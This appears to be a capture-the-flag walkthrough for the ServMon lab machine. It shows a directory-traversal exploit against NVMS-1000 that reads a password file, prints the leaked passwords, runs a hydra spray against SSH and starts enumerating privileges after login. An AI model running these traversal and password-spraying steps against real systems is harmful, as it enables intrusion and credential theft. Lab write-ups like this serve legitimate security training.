3 :80 NVMS
http://servmon.htb > http://servmon.htb/Pages/login.htm
NVMS-1000 login page
| network video monitoring system
Using https://www.exploit-db.com/exploits/48311
# didn't work
Using https://github.com/AleDiBen/NVMS1000-Exploit/blob/master/nvms.py
$ python3 nvms.py 10.10.10.184 Windows/system.ini win.ini
[+] DT Attack Succeeded
[+] Saving File Content
[+] Saved
[+] File Content
# works,
# time to read C:\Users\Nathan\Desktop\Passwords.txt
$ python3 nvms.py 10.10.10.184 Users/Nathan/Desktop/Passwords.txt nathan-pass.txt
[+] DT Attack Succeeded
[+] Saving File Content
[+] Saved
[+] File Content
++++++++++ BEGIN ++++++++++
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
++++++++++ END ++++++++++
# time to spray these passwords
$ cat users
nathan
nadine
admin
# we have ssh, smb
$ hydra -L users -P nathan-pass.txt ssh://10.10.10.184 -t 4 -s 22
[22][ssh] host: 10.10.10.184 login: nadine password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 1 valid password found
$ ssh nadine@10.10.10.184
nadine@SERVMON C:\Users\Nadine>whoami
servmon\nadine
nadine@SERVMON C:\Users\Nadine>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
nadine@SERVMON C:\Users\Nadine>systeminfo
ERROR: Access denied
Last updated